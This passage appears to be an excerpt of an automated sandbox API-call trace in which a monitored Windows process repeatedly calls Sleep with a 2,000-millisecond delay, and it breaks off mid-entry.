[0233.414] Sleep (dwMilliseconds=0x7d0) [0233.421] Sleep (dwMilliseconds=0x7d0) [0233.422] Sleep (dwMilliseconds=0x7d0) [0233.428] Sleep (dwMilliseconds=0x7d0) [0233.430] Sleep (dwMilliseconds=0x7d0) [0233.435] Sleep (dwMilliseconds=0x7d0) [0233.437] Sleep (dwMilliseconds=0x7d0) [0233.444] Sleep (dwMilliseconds=0x7d0) [0233.446] Sleep (dwMilliseconds=0x7d0) [0233.453] Sleep (dwMilliseconds=0x7d0) [0233.454] Sleep (dwMilliseconds=0x7d0) [0233.460] Sleep (dwMilliseconds=0x7d0) [0233.467] Sleep (dwMilliseconds=0x7d0) [0233.468] Sleep (dwMilliseconds=0x7d0) [0233.475] Sleep (dwMilliseconds=0x7d0) [0233.476] Sleep (dwMilliseconds=0x7d0) [0233.482] Sleep (dwMilliseconds=0x7d0) [0233.483] Sleep (dwMilliseconds=0x7d0) [0233.490] Sleep (dwMilliseconds=0x7d0) [0233.491] Sleep (dwMilliseconds=0x7d0) [0233.496] Sleep (dwMilliseconds=0x7d0) [0233.502] Sleep (dwMilliseconds=0x7d0) [0233.508] Sleep (dwMilliseconds=0x7d0) [0233.510] Sleep (dwMilliseconds=0x7d0) [0233.516] Sleep (dwMilliseconds=0x7d0) [0233.518] Sleep (dwMilliseconds=0x7d0) [0233.524] Sleep (dwMilliseconds=0x7d0) [0233.526] Sleep (dwMilliseconds=0x7d0) [0233.532] Sleep (dwMilliseconds=0x7d0) [0233.538] Sleep (dwMilliseconds=0x7d0) [0233.539] Sleep (dwMilliseconds=0x7d0) [0233.542] Sleep (dwMilliseconds=0x7d0) [0233.545] Sleep (dwMilliseconds=0x7d0) [0233.552] Sleep (dwMilliseconds=0x7d0) [0233.553] Sleep (dwMilliseconds=0x7d0) [0233.558] Sleep (dwMilliseconds=0x7d0) [0233.560] Sleep (dwMilliseconds=0x7d0) [0233.566] Sleep (dwMilliseconds=0x7d0) [0233.567] Sleep (dwMilliseconds=0x7d0) [0233.573] Sleep (dwMilliseconds=0x7d0) [0233.574] Sleep (dwMilliseconds=0x7d0) [0233.580] Sleep (dwMilliseconds=0x7d0) [0233.581] Sleep (dwMilliseconds=0x7d0) [0233.587] Sleep (dwMilliseconds=0x7d0) [0233.588] Sleep (dwMilliseconds=0x7d0) [0233.593] Sleep (dwMilliseconds=0x7d0) [0233.594] Sleep (dwMilliseconds=0x7d0) [0233.600] Sleep (dwMilliseconds=0x7d0) [0233.603] Sleep (dwMilliseconds=0x7d0) [0233.610] Sleep (dwMilliseconds=0x7d0) [0233.617] Sleep (dwMilliseconds=0x7d0) [0233.618] Sleep (dwMilliseconds=0x7d0) [0233.625] Sleep (dwMilliseconds=0x7d0) [0233.627] Sleep (dwMilliseconds=0x7d0) [0233.632] Sleep (dwMilliseconds=0x7d0) [0233.634] Sleep (dwMilliseconds=0x7d0) [0233.637] Sleep (dwMilliseconds=0x7d0) [0233.639] Sleep (dwMilliseconds=0x7d0) [0233.641] Sleep (dwMilliseconds=0x7d0) [0233.647] Sleep (dwMilliseconds=0x7d0) [0233.654] Sleep (dwMilliseconds=0x7d0) [0233.661] Sleep (dwMilliseconds=0x7d0) [0233.663] Sleep (dwMilliseconds=0x7d0) [0233.668] Sleep (dwMilliseconds=0x7d0) [0233.669] Sleep (dwMilliseconds=0x7d0) [0233.675] Sleep (dwMilliseconds=0x7d0) [0233.676] Sleep (dwMilliseconds=0x7d0) [0233.682] Sleep (dwMilliseconds=0x7d0) [0233.683] Sleep (dwMilliseconds=0x7d0) [0233.685] Sleep (dwMilliseconds=0x7d0) [0233.690] Sleep (dwMilliseconds=0x7d0) [0233.696] Sleep (dwMilliseconds=0x7d0) [0233.702] Sleep (dwMilliseconds=0x7d0) [0233.704] Sleep (dwMilliseconds=0x7d0) [0233.709] Sleep (dwMilliseconds=0x7d0) [0233.710] Sleep (dwMilliseconds=0x7d0) [0233.716] Sleep (dwMilliseconds=0x7d0) [0233.718] Sleep (dwMilliseconds=0x7d0) [0233.896] Sleep (dwMilliseconds=0x7d0) [0233.898] Sleep (dwMilliseconds=0x7d0) [0233.902] Sleep (dwMilliseconds=0x7d0) [0233.904] Sleep (dwMilliseconds=0x7d0) [0233.905] Sleep (dwMilliseconds=0x7d0) [0233.911] Sleep (dwMilliseconds=0x7d0) [0233.918] Sleep (dwMilliseconds=0x7d0) [0233.920] Sleep (dwMilliseconds=0x7d0) [0233.925] Sleep (dwMilliseconds=0x7d0) [0233.926] Sleep (dwMilliseconds=0x7d0) [0233.932] Sleep (dwMilliseconds=0x7d0) [0233.939] Sleep (dwMilliseconds=0x7d0) [0233.940] Sleep (dwMilliseconds=0x7d0) [0233.945] Sleep (dwMilliseconds=0x7d0) [0233.947] Sleep (dwMilliseconds=0x7d0) [0233.955] Sleep (dwMilliseconds=0x7d0) [0233.961] Sleep (dwMilliseconds=0x7d0) [0233.962] Sleep (dwMilliseconds=0x7d0) [0233.968] Sleep (dwMilliseconds=0x7d0) [0233.969] Sleep (dwMilliseconds=0x7d0) [0233.976] Sleep (dwMilliseconds=0x7d0) [0233.978] Sleep (dwMilliseconds=0x7d0) [0233.984] Sleep (dwMilliseconds=0x7d0) [0233.991] Sleep (dwMilliseconds=0x7d0) [0233.993] Sleep (dwMilliseconds=0x7d0) [0233.999] Sleep (dwMilliseconds=0x7d0) [0234.000] Sleep (dwMilliseconds=0x7d0) [0234.006] Sleep (dwMilliseconds=0x7d0) [0234.008] Sleep (dwMilliseconds=0x7d0) [0234.013] Sleep (dwMilliseconds=0x7d0) [0234.015] Sleep (dwMilliseconds=0x7d0) [0234.021] Sleep (dwMilliseconds=0x7d0) [0234.023] Sleep (dwMilliseconds=0x7d0) [0234.054] Sleep (dwMilliseconds=0x7d0) [0234.060] Sleep (dwMilliseconds=0x7d0) [0234.062] Sleep (dwMilliseconds=0x7d0) [0234.063] Sleep (dwMilliseconds=0x7d0) [0234.068] Sleep (dwMilliseconds=0x7d0) [0234.074] Sleep (dwMilliseconds=0x7d0) [0234.076] Sleep (dwMilliseconds=0x7d0) [0234.081] Sleep (dwMilliseconds=0x7d0) [0234.083] Sleep (dwMilliseconds=0x7d0) [0234.088] Sleep (dwMilliseconds=0x7d0) [0234.094] Sleep (dwMilliseconds=0x7d0) [0234.096] Sleep (dwMilliseconds=0x7d0) [0234.102] Sleep (dwMilliseconds=0x7d0) [0234.103] Sleep (dwMilliseconds=0x7d0) [0234.107] Sleep (dwMilliseconds=0x7d0) [0234.109] Sleep (dwMilliseconds=0x7d0) [0234.110] Sleep (dwMilliseconds=0x7d0) [0234.117] Sleep (dwMilliseconds=0x7d0) [0234.122] Sleep (dwMilliseconds=0x7d0) [0234.128] Sleep (dwMilliseconds=0x7d0) [0234.147] Sleep (dwMilliseconds=0x7d0) [0234.149] Sleep (dwMilliseconds=0x7d0) [0234.150] Sleep (dwMilliseconds=0x7d0) [0234.157] Sleep (dwMilliseconds=0x7d0) [0234.158] Sleep (dwMilliseconds=0x7d0) [0234.164] Sleep (dwMilliseconds=0x7d0) [0234.165] Sleep (dwMilliseconds=0x7d0) [0234.185] Sleep (dwMilliseconds=0x7d0) [0234.187] Sleep (dwMilliseconds=0x7d0) [0234.188] Sleep (dwMilliseconds=0x7d0) [0234.192] Sleep (dwMilliseconds=0x7d0) [0234.199] Sleep (dwMilliseconds=0x7d0) [0234.205] Sleep (dwMilliseconds=0x7d0) [0234.207] Sleep (dwMilliseconds=0x7d0) [0234.212] Sleep (dwMilliseconds=0x7d0) [0234.219] Sleep (dwMilliseconds=0x7d0) [0234.221] Sleep (dwMilliseconds=0x7d0) [0234.226] Sleep (dwMilliseconds=0x7d0) [0234.227] Sleep (dwMilliseconds=0x7d0) [0234.231] Sleep (dwMilliseconds=0x7d0) [0234.233] Sleep (dwMilliseconds=0x7d0) [0234.234] Sleep (dwMilliseconds=0x7d0) [0234.240] Sleep (dwMilliseconds=0x7d0) [0234.241] Sleep (dwMilliseconds=0x7d0) [0234.246] Sleep (dwMilliseconds=0x7d0) [0234.248] Sleep (dwMilliseconds=0x7d0) [0234.254] Sleep (dwMilliseconds=0x7d0) [0234.259] Sleep (dwMilliseconds=0x7d0) [0234.261] Sleep (dwMilliseconds=0x7d0) [0234.266] Sleep (dwMilliseconds=0x7d0) [0234.267] Sleep (dwMilliseconds=0x7d0) [0234.273] Sleep (dwMilliseconds=0x7d0) [0234.274] Sleep (dwMilliseconds=0x7d0) [0234.277] Sleep (dwMilliseconds=0x7d0) [0234.280] Sleep (dwMilliseconds=0x7d0) [0234.281] Sleep (dwMilliseconds=0x7d0) [0234.286] Sleep (dwMilliseconds=0x7d0) [0234.288] Sleep (dwMilliseconds=0x7d0) [0234.293] Sleep (dwMilliseconds=0x7d0) [0234.294] Sleep (dwMilliseconds=0x7d0) [0234.299] Sleep (dwMilliseconds=0x7d0) [0234.301] Sleep (dwMilliseconds=0x7d0) [0234.306] Sleep (dwMilliseconds=0x7d0) [0234.307] Sleep (dwMilliseconds=0x7d0) [0234.312] Sleep (dwMilliseconds=0x7d0) [0234.314] Sleep (dwMilliseconds=0x7d0) [0234.319] Sleep (dwMilliseconds=0x7d0) [0234.320] Sleep (dwMilliseconds=0x7d0) [0234.322] Sleep (dwMilliseconds=0x7d0) [0234.326] Sleep (dwMilliseconds=0x7d0) [0234.333] Sleep (dwMilliseconds=0x7d0) [0234.335] Sleep (dwMilliseconds=0x7d0) [0234.348] Sleep (dwMilliseconds=0x7d0) [0234.349] Sleep (dwMilliseconds=0x7d0) [0234.357] Sleep (dwMilliseconds=0x7d0) [0234.358] Sleep (dwMilliseconds=0x7d0) [0234.364] Sleep (dwMilliseconds=0x7d0) [0234.371] Sleep (dwMilliseconds=0x7d0) [0234.373] Sleep (dwMilliseconds=0x7d0) [0234.375] Sleep (dwMilliseconds=0x7d0) [0234.379] Sleep (dwMilliseconds=0x7d0) [0234.381] Sleep (dwMilliseconds=0x7d0) [0234.386] Sleep (dwMilliseconds=0x7d0) [0234.388] Sleep (dwMilliseconds=0x7d0) [0234.393] Sleep (dwMilliseconds=0x7d0) [0234.395] Sleep (dwMilliseconds=0x7d0) [0234.400] Sleep (dwMilliseconds=0x7d0) [0234.402] Sleep (dwMilliseconds=0x7d0) [0234.407] Sleep (dwMilliseconds=0x7d0) [0234.409] Sleep (dwMilliseconds=0x7d0) [0234.414] Sleep (dwMilliseconds=0x7d0) [0234.415] Sleep (dwMilliseconds=0x7d0) [0234.420] Sleep (dwMilliseconds=0x7d0) [0234.421] Sleep (dwMilliseconds=0x7d0) [0234.428] Sleep (dwMilliseconds=0x7d0) [0234.429] Sleep (dwMilliseconds=0x7d0) [0234.435] Sleep (dwMilliseconds=0x7d0) [0234.436] Sleep (dwMilliseconds=0x7d0) [0234.444] Sleep (dwMilliseconds=0x7d0) [0234.446] Sleep (dwMilliseconds=0x7d0) [0234.452] Sleep (dwMilliseconds=0x7d0) [0234.453] Sleep (dwMilliseconds=0x7d0) [0234.460] Sleep (dwMilliseconds=0x7d0) [0234.461] Sleep (dwMilliseconds=0x7d0) [0234.466] Sleep (dwMilliseconds=0x7d0) [0234.467] Sleep (dwMilliseconds=0x7d0) [0234.475] Sleep (dwMilliseconds=0x7d0) [0234.477] Sleep (dwMilliseconds=0x7d0) [0234.483] Sleep (dwMilliseconds=0x7d0) [0234.484] Sleep (dwMilliseconds=0x7d0) [0234.491] Sleep (dwMilliseconds=0x7d0) [0234.492] Sleep (dwMilliseconds=0x7d0) [0234.499] Sleep (dwMilliseconds=0x7d0) [0234.502] Sleep (dwMilliseconds=0x7d0) [0234.509] Sleep (dwMilliseconds=0x7d0) [0234.514] Sleep (dwMilliseconds=0x7d0) [0234.519] Sleep (dwMilliseconds=0x7d0) [0234.521] Sleep (dwMilliseconds=0x7d0) [0234.530] Sleep (dwMilliseconds=0x7d0) [0234.531] Sleep (dwMilliseconds=0x7d0) [0234.540] Sleep (dwMilliseconds=0x7d0) [0234.541] Sleep (dwMilliseconds=0x7d0) [0234.566] Sleep (dwMilliseconds=0x7d0) [0234.570] Sleep (dwMilliseconds=0x7d0) [0234.576] Sleep (dwMilliseconds=0x7d0) [0234.585] Sleep (dwMilliseconds=0x7d0) [0234.595] Sleep (dwMilliseconds=0x7d0) [0234.596] Sleep (dwMilliseconds=0x7d0) [0234.604] Sleep (dwMilliseconds=0x7d0) [0234.605] Sleep (dwMilliseconds=0x7d0) [0234.614] Sleep (dwMilliseconds=0x7d0) [0234.620] Sleep (dwMilliseconds=0x7d0) [0234.626] Sleep (dwMilliseconds=0x7d0) [0234.635] Sleep (dwMilliseconds=0x7d0) [0234.637] Sleep (dwMilliseconds=0x7d0) [0234.645] Sleep (dwMilliseconds=0x7d0) [0234.646] Sleep (dwMilliseconds=0x7d0) [0234.654] Sleep (dwMilliseconds=0x7d0) [0234.664] Sleep (dwMilliseconds=0x7d0) [0234.666] Sleep (dwMilliseconds=0x7d0) [0234.674] Sleep (dwMilliseconds=0x7d0) [0234.675] Sleep (dwMilliseconds=0x7d0) [0234.683] Sleep (dwMilliseconds=0x7d0) [0234.696] Sleep (dwMilliseconds=0x7d0) [0234.698] Sleep (dwMilliseconds=0x7d0) [0234.705] Sleep (dwMilliseconds=0x7d0) [0234.707] Sleep (dwMilliseconds=0x7d0) [0234.713] Sleep (dwMilliseconds=0x7d0) [0234.715] Sleep (dwMilliseconds=0x7d0) [0234.716] Sleep (dwMilliseconds=0x7d0) [0234.725] Sleep (dwMilliseconds=0x7d0) [0234.726] Sleep (dwMilliseconds=0x7d0) [0234.734] Sleep (dwMilliseconds=0x7d0) [0234.736] Sleep (dwMilliseconds=0x7d0) [0234.745] Sleep (dwMilliseconds=0x7d0) [0234.754] Sleep (dwMilliseconds=0x7d0) [0234.756] Sleep (dwMilliseconds=0x7d0) [0234.758] Sleep (dwMilliseconds=0x7d0) [0234.766] Sleep (dwMilliseconds=0x7d0) [0234.774] Sleep (dwMilliseconds=0x7d0) [0234.776] Sleep (dwMilliseconds=0x7d0) [0234.785] Sleep (dwMilliseconds=0x7d0) [0234.794] Sleep (dwMilliseconds=0x7d0) [0234.796] Sleep (dwMilliseconds=0x7d0) [0234.801] Sleep (dwMilliseconds=0x7d0) [0234.804] Sleep (dwMilliseconds=0x7d0) [0234.813] Sleep (dwMilliseconds=0x7d0) [0234.823] Sleep (dwMilliseconds=0x7d0) [0234.832] Sleep (dwMilliseconds=0x7d0) [0234.834] Sleep (dwMilliseconds=0x7d0) [0234.842] Sleep (dwMilliseconds=0x7d0) [0234.845] Sleep (dwMilliseconds=0x7d0) [0234.853] Sleep (dwMilliseconds=0x7d0) [0234.862] Sleep (dwMilliseconds=0x7d0) [0234.863] Sleep (dwMilliseconds=0x7d0) [0234.870] Sleep (dwMilliseconds=0x7d0) [0234.871] Sleep (dwMilliseconds=0x7d0) [0234.877] Sleep (dwMilliseconds=0x7d0) [0234.885] Sleep (dwMilliseconds=0x7d0) [0234.886] Sleep (dwMilliseconds=0x7d0) [0234.888] Sleep (dwMilliseconds=0x7d0) [0234.894] Sleep (dwMilliseconds=0x7d0) [0234.895] Sleep (dwMilliseconds=0x7d0) [0234.902] Sleep (dwMilliseconds=0x7d0) [0234.909] Sleep (dwMilliseconds=0x7d0) [0234.911] Sleep (dwMilliseconds=0x7d0) [0234.916] Sleep (dwMilliseconds=0x7d0) [0234.917] Sleep (dwMilliseconds=0x7d0) [0234.923] Sleep (dwMilliseconds=0x7d0) [0234.925] Sleep (dwMilliseconds=0x7d0) [0234.932] Sleep (dwMilliseconds=0x7d0) [0234.933] Sleep (dwMilliseconds=0x7d0) [0234.939] Sleep (dwMilliseconds=0x7d0) [0234.940] Sleep (dwMilliseconds=0x7d0) [0234.947] Sleep (dwMilliseconds=0x7d0) [0234.948] Sleep (dwMilliseconds=0x7d0) [0234.954] Sleep (dwMilliseconds=0x7d0) [0234.955] Sleep (dwMilliseconds=0x7d0) [0234.962] Sleep (dwMilliseconds=0x7d0) [0234.973] Sleep (dwMilliseconds=0x7d0) [0234.974] Sleep (dwMilliseconds=0x7d0) [0234.979] Sleep (dwMilliseconds=0x7d0) [0234.982] Sleep (dwMilliseconds=0x7d0) [0234.989] Sleep (dwMilliseconds=0x7d0) [0234.990] Sleep (dwMilliseconds=0x7d0) [0235.001] Sleep (dwMilliseconds=0x7d0) [0235.010] Sleep (dwMilliseconds=0x7d0) [0235.018] Sleep (dwMilliseconds=0x7d0) [0235.019] Sleep (dwMilliseconds=0x7d0) [0235.024] Sleep (dwMilliseconds=0x7d0) [0235.027] Sleep (dwMilliseconds=0x7d0) [0235.095] Sleep (dwMilliseconds=0x7d0) [0235.105] Sleep (dwMilliseconds=0x7d0) [0235.114] Sleep (dwMilliseconds=0x7d0) [0235.125] Sleep (dwMilliseconds=0x7d0) [0235.134] Sleep (dwMilliseconds=0x7d0) [0235.135] Sleep (dwMilliseconds=0x7d0) [0235.142] Sleep (dwMilliseconds=0x7d0) [0235.143] Sleep (dwMilliseconds=0x7d0) [0235.150] Sleep (dwMilliseconds=0x7d0) [0235.151] Sleep (dwMilliseconds=0x7d0) [0235.159] Sleep (dwMilliseconds=0x7d0) [0235.168] Sleep (dwMilliseconds=0x7d0) [0235.178] Sleep (dwMilliseconds=0x7d0) [0235.179] Sleep (dwMilliseconds=0x7d0) [0235.181] Sleep (dwMilliseconds=0x7d0) [0235.189] Sleep (dwMilliseconds=0x7d0) [0235.191] Sleep (dwMilliseconds=0x7d0) [0235.199] Sleep (dwMilliseconds=0x7d0) [0235.200] Sleep (dwMilliseconds=0x7d0) [0235.208] Sleep (dwMilliseconds=0x7d0) [0235.209] Sleep (dwMilliseconds=0x7d0) [0235.219] Sleep (dwMilliseconds=0x7d0) [0235.224] Sleep (dwMilliseconds=0x7d0) [0235.228] Sleep (dwMilliseconds=0x7d0) [0235.229] Sleep (dwMilliseconds=0x7d0) [0235.236] Sleep (dwMilliseconds=0x7d0) [0235.238] Sleep (dwMilliseconds=0x7d0) [0235.244] Sleep (dwMilliseconds=0x7d0) [0235.251] Sleep (dwMilliseconds=0x7d0) [0235.253] Sleep (dwMilliseconds=0x7d0) [0235.259] Sleep (dwMilliseconds=0x7d0) [0235.261] Sleep (dwMilliseconds=0x7d0) [0235.267] Sleep (dwMilliseconds=0x7d0) [0235.268] Sleep (dwMilliseconds=0x7d0) [0235.276] Sleep (dwMilliseconds=0x7d0) [0235.284] Sleep (dwMilliseconds=0x7d0) [0235.286] Sleep (dwMilliseconds=0x7d0) [0235.293] Sleep (dwMilliseconds=0x7d0) [0235.295] Sleep (dwMilliseconds=0x7d0) [0235.301] Sleep (dwMilliseconds=0x7d0) [0235.307] Sleep (dwMilliseconds=0x7d0) [0235.309] Sleep (dwMilliseconds=0x7d0) [0235.312] Sleep (dwMilliseconds=0x7d0) [0235.315] Sleep (dwMilliseconds=0x7d0) [0235.316] Sleep (dwMilliseconds=0x7d0) [0235.322] Sleep (dwMilliseconds=0x7d0) [0235.323] Sleep (dwMilliseconds=0x7d0) [0235.329] Sleep (dwMilliseconds=0x7d0) [0235.330] Sleep (dwMilliseconds=0x7d0) [0235.337] Sleep (dwMilliseconds=0x7d0) [0235.338] Sleep (dwMilliseconds=0x7d0) [0235.353] Sleep (dwMilliseconds=0x7d0) [0235.361] Sleep (dwMilliseconds=0x7d0) [0235.362] Sleep (dwMilliseconds=0x7d0) [0235.364] Sleep (dwMilliseconds=0x7d0) [0235.368] Sleep (dwMilliseconds=0x7d0) [0235.376] Sleep (dwMilliseconds=0x7d0) [0235.377] Sleep (dwMilliseconds=0x7d0) [0235.383] Sleep (dwMilliseconds=0x7d0) [0235.385] Sleep (dwMilliseconds=0x7d0) [0235.392] Sleep (dwMilliseconds=0x7d0) [0235.398] Sleep (dwMilliseconds=0x7d0) [0235.399] Sleep (dwMilliseconds=0x7d0) [0235.405] Sleep (dwMilliseconds=0x7d0) [0235.408] Sleep (dwMilliseconds=0x7d0) [0235.413] Sleep (dwMilliseconds=0x7d0) [0235.414] Sleep (dwMilliseconds=0x7d0) [0235.420] Sleep (dwMilliseconds=0x7d0) [0235.422] Sleep (dwMilliseconds=0x7d0) [0235.427] Sleep (dwMilliseconds=0x7d0) [0235.429] Sleep (dwMilliseconds=0x7d0) [0235.440] Sleep (dwMilliseconds=0x7d0) [0235.442] Sleep (dwMilliseconds=0x7d0) [0235.447] Sleep (dwMilliseconds=0x7d0) [0235.455] Sleep (dwMilliseconds=0x7d0) [0235.462] Sleep (dwMilliseconds=0x7d0) [0235.469] Sleep (dwMilliseconds=0x7d0) [0235.471] Sleep (dwMilliseconds=0x7d0) [0235.482] Sleep (dwMilliseconds=0x7d0) [0235.483] Sleep (dwMilliseconds=0x7d0) [0235.489] Sleep (dwMilliseconds=0x7d0) [0235.490] Sleep (dwMilliseconds=0x7d0) [0235.499] Sleep (dwMilliseconds=0x7d0) [0235.501] Sleep (dwMilliseconds=0x7d0) [0235.505] Sleep (dwMilliseconds=0x7d0) [0235.512] Sleep (dwMilliseconds=0x7d0) [0235.513] Sleep (dwMilliseconds=0x7d0) [0235.523] Sleep (dwMilliseconds=0x7d0) [0235.524] Sleep (dwMilliseconds=0x7d0) [0235.530] Sleep (dwMilliseconds=0x7d0) [0235.531] Sleep (dwMilliseconds=0x7d0) [0235.537] Sleep (dwMilliseconds=0x7d0) [0235.544] Sleep (dwMilliseconds=0x7d0) [0235.551] Sleep (dwMilliseconds=0x7d0) [0235.552] Sleep (dwMilliseconds=0x7d0) [0235.558] Sleep (dwMilliseconds=0x7d0) [0235.559] Sleep (dwMilliseconds=0x7d0) [0235.568] Sleep (dwMilliseconds=0x7d0) [0235.574] Sleep (dwMilliseconds=0x7d0) [0235.576] Sleep (dwMilliseconds=0x7d0) [0235.585] Sleep (dwMilliseconds=0x7d0) [0235.592] Sleep (dwMilliseconds=0x7d0) [0235.593] Sleep (dwMilliseconds=0x7d0) [0235.595] Sleep (dwMilliseconds=0x7d0) [0235.600] Sleep (dwMilliseconds=0x7d0) [0235.605] Sleep (dwMilliseconds=0x7d0) [0235.607] Sleep (dwMilliseconds=0x7d0) [0235.614] Sleep (dwMilliseconds=0x7d0) [0235.615] Sleep (dwMilliseconds=0x7d0) [0235.621] Sleep (dwMilliseconds=0x7d0) [0235.628] Sleep (dwMilliseconds=0x7d0) [0235.629] Sleep (dwMilliseconds=0x7d0) [0235.636] Sleep (dwMilliseconds=0x7d0) [0235.637] Sleep (dwMilliseconds=0x7d0) [0235.640] Sleep (dwMilliseconds=0x7d0) [0235.644] Sleep (dwMilliseconds=0x7d0) [0235.651] Sleep (dwMilliseconds=0x7d0) [0235.652] Sleep (dwMilliseconds=0x7d0) [0235.657] Sleep (dwMilliseconds=0x7d0) [0235.659] Sleep (dwMilliseconds=0x7d0) [0235.665] Sleep (dwMilliseconds=0x7d0) [0235.666] Sleep (dwMilliseconds=0x7d0) [0235.672] Sleep (dwMilliseconds=0x7d0) [0235.673] Sleep (dwMilliseconds=0x7d0) [0235.680] Sleep (dwMilliseconds=0x7d0) [0235.681] Sleep (dwMilliseconds=0x7d0) [0235.685] Sleep (dwMilliseconds=0x7d0) [0235.687] Sleep (dwMilliseconds=0x7d0) [0235.688] Sleep (dwMilliseconds=0x7d0) [0235.694] Sleep (dwMilliseconds=0x7d0) [0235.695] Sleep (dwMilliseconds=0x7d0) [0235.701] Sleep (dwMilliseconds=0x7d0) [0235.707] Sleep (dwMilliseconds=0x7d0) [0235.709] Sleep (dwMilliseconds=0x7d0) [0235.716] Sleep (dwMilliseconds=0x7d0) [0235.726] Sleep (dwMilliseconds=0x7d0) [0235.731] Sleep (dwMilliseconds=0x7d0) [0235.739] Sleep (dwMilliseconds=0x7d0) [0235.748] Sleep (dwMilliseconds=0x7d0) [0235.756] Sleep (dwMilliseconds=0x7d0) [0235.757] Sleep (dwMilliseconds=0x7d0) [0235.763] Sleep (dwMilliseconds=0x7d0) [0235.765] Sleep (dwMilliseconds=0x7d0) [0235.770] Sleep (dwMilliseconds=0x7d0) [0235.771] Sleep (dwMilliseconds=0x7d0) [0235.776] Sleep (dwMilliseconds=0x7d0) [0235.777] Sleep (dwMilliseconds=0x7d0) [0235.779] Sleep (dwMilliseconds=0x7d0) [0235.785] Sleep (dwMilliseconds=0x7d0) [0235.791] Sleep (dwMilliseconds=0x7d0) [0235.797] Sleep (dwMilliseconds=0x7d0) [0235.798] Sleep (dwMilliseconds=0x7d0) [0235.806] Sleep (dwMilliseconds=0x7d0) [0235.807] Sleep (dwMilliseconds=0x7d0) [0235.813] Sleep (dwMilliseconds=0x7d0) [0235.814] Sleep (dwMilliseconds=0x7d0) [0235.821] Sleep (dwMilliseconds=0x7d0) [0235.823] Sleep (dwMilliseconds=0x7d0) [0235.827] Sleep (dwMilliseconds=0x7d0) [0235.829] Sleep (dwMilliseconds=0x7d0) [0235.835] Sleep (dwMilliseconds=0x7d0) [0235.841] Sleep (dwMilliseconds=0x7d0) [0235.842] Sleep (dwMilliseconds=0x7d0) [0235.848] Sleep (dwMilliseconds=0x7d0) [0235.849] Sleep (dwMilliseconds=0x7d0) [0235.854] Sleep (dwMilliseconds=0x7d0) [0235.856] Sleep (dwMilliseconds=0x7d0) [0235.862] Sleep (dwMilliseconds=0x7d0) [0235.867] Sleep (dwMilliseconds=0x7d0) [0235.869] Sleep (dwMilliseconds=0x7d0) [0235.870] Sleep (dwMilliseconds=0x7d0) [0235.897] Sleep (dwMilliseconds=0x7d0) [0235.910] Sleep (dwMilliseconds=0x7d0) [0235.919] Sleep (dwMilliseconds=0x7d0) [0235.920] Sleep (dwMilliseconds=0x7d0) [0235.928] Sleep (dwMilliseconds=0x7d0) [0235.929] Sleep (dwMilliseconds=0x7d0) [0235.935] Sleep (dwMilliseconds=0x7d0) [0235.941] Sleep (dwMilliseconds=0x7d0) [0235.948] Sleep (dwMilliseconds=0x7d0) [0235.949] Sleep (dwMilliseconds=0x7d0) [0235.955] Sleep (dwMilliseconds=0x7d0) [0235.956] Sleep (dwMilliseconds=0x7d0) [0235.961] Sleep (dwMilliseconds=0x7d0) [0235.963] Sleep (dwMilliseconds=0x7d0) [0235.968] Sleep (dwMilliseconds=0x7d0) [0235.975] Sleep (dwMilliseconds=0x7d0) [0235.976] Sleep (dwMilliseconds=0x7d0) [0235.985] Sleep (dwMilliseconds=0x7d0) [0235.989] Sleep (dwMilliseconds=0x7d0) [0235.992] Sleep (dwMilliseconds=0x7d0) [0235.994] Sleep (dwMilliseconds=0x7d0) [0235.999] Sleep (dwMilliseconds=0x7d0) [0236.001] Sleep (dwMilliseconds=0x7d0) [0236.007] Sleep (dwMilliseconds=0x7d0) [0236.009] Sleep (dwMilliseconds=0x7d0) [0236.014] Sleep (dwMilliseconds=0x7d0) [0236.015] Sleep (dwMilliseconds=0x7d0) [0236.021] Sleep (dwMilliseconds=0x7d0) [0236.022] Sleep (dwMilliseconds=0x7d0) [0236.048] Sleep (dwMilliseconds=0x7d0) [0236.049] Sleep (dwMilliseconds=0x7d0) [0236.055] Sleep (dwMilliseconds=0x7d0) [0236.057] Sleep (dwMilliseconds=0x7d0) [0236.064] Sleep (dwMilliseconds=0x7d0) [0236.071] Sleep (dwMilliseconds=0x7d0) [0236.072] Sleep (dwMilliseconds=0x7d0) [0236.079] Sleep (dwMilliseconds=0x7d0) [0236.085] Sleep (dwMilliseconds=0x7d0) [0236.094] Sleep (dwMilliseconds=0x7d0) [0236.095] Sleep (dwMilliseconds=0x7d0) [0236.101] Sleep (dwMilliseconds=0x7d0) [0236.102] Sleep (dwMilliseconds=0x7d0) [0236.133] Sleep (dwMilliseconds=0x7d0) [0236.140] Sleep (dwMilliseconds=0x7d0) [0236.141] Sleep (dwMilliseconds=0x7d0) [0236.147] Sleep (dwMilliseconds=0x7d0) [0236.148] Sleep (dwMilliseconds=0x7d0) [0236.155] Sleep (dwMilliseconds=0x7d0) [0236.156] Sleep (dwMilliseconds=0x7d0) [0236.163] Sleep (dwMilliseconds=0x7d0) [0236.171] Sleep (dwMilliseconds=0x7d0) [0236.172] Sleep (dwMilliseconds=0x7d0) [0236.179] Sleep (dwMilliseconds=0x7d0) [0236.180] Sleep (dwMilliseconds=0x7d0) [0236.186] Sleep (dwMilliseconds=0x7d0) [0236.188] Sleep (dwMilliseconds=0x7d0) [0236.193] Sleep (dwMilliseconds=0x7d0) [0236.195] Sleep (dwMilliseconds=0x7d0) [0236.201] Sleep (dwMilliseconds=0x7d0) [0236.202] Sleep (dwMilliseconds=0x7d0) [0236.207] Sleep (dwMilliseconds=0x7d0) [0236.209] Sleep (dwMilliseconds=0x7d0) [0236.214] Sleep (dwMilliseconds=0x7d0) [0236.217] Sleep (dwMilliseconds=0x7d0) [0236.218] Sleep (dwMilliseconds=0x7d0) [0236.224] Sleep (dwMilliseconds=0x7d0) [0236.235] Sleep (dwMilliseconds=0x7d0) [0236.246] Sleep (dwMilliseconds=0x7d0) [0236.253] Sleep (dwMilliseconds=0x7d0) [0236.259] Sleep (dwMilliseconds=0x7d0) [0236.261] Sleep (dwMilliseconds=0x7d0) [0236.266] Sleep (dwMilliseconds=0x7d0) [0236.270] Sleep (dwMilliseconds=0x7d0) [0236.276] Sleep (dwMilliseconds=0x7d0) [0236.277] Sleep (dwMilliseconds=0x7d0) [0236.279] Sleep (dwMilliseconds=0x7d0) [0236.284] Sleep (dwMilliseconds=0x7d0) [0236.285] Sleep (dwMilliseconds=0x7d0) [0236.291] Sleep (dwMilliseconds=0x7d0) [0236.293] Sleep (dwMilliseconds=0x7d0) [0236.298] Sleep (dwMilliseconds=0x7d0) [0236.306] Sleep (dwMilliseconds=0x7d0) [0236.307] Sleep (dwMilliseconds=0x7d0) [0236.315] Sleep 